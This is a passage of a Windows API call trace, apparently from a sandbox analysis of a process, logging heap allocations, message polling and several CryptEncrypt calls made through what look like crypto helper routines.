hHeap=0x970000) returned 1 [0243.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0243.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0243.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0243.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0243.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0243.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0243.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.436] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0243.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0243.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.436] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04428 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04428 | out: hHeap=0x970000) returned 1 [0243.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0243.436] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0243.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.496] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0243.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0243.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.496] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.496] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.496] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0243.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.497] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0243.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0243.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0243.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.498] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0243.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.498] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1db5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1db8) returned 1 [0243.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x9785b0 [0243.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0243.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0243.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0243.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0243.500] CharLowerBuffW (in: lpsz="byte[7608]", cchLength=0xa | out: lpsz="byte[7608]") returned 0xa [0243.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f044d0 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0243.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0243.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0243.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51370 [0243.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0243.503] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf5990*, pdwDataLen=0x8cef60*=0x1db5, dwBufLen=0x1db8 | out: pbData=0x3bf5990*, pdwDataLen=0x8cef60*=0x1db8) returned 1 [0243.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x9785b0 [0243.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0243.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0243.505] RtlAllocateHeap 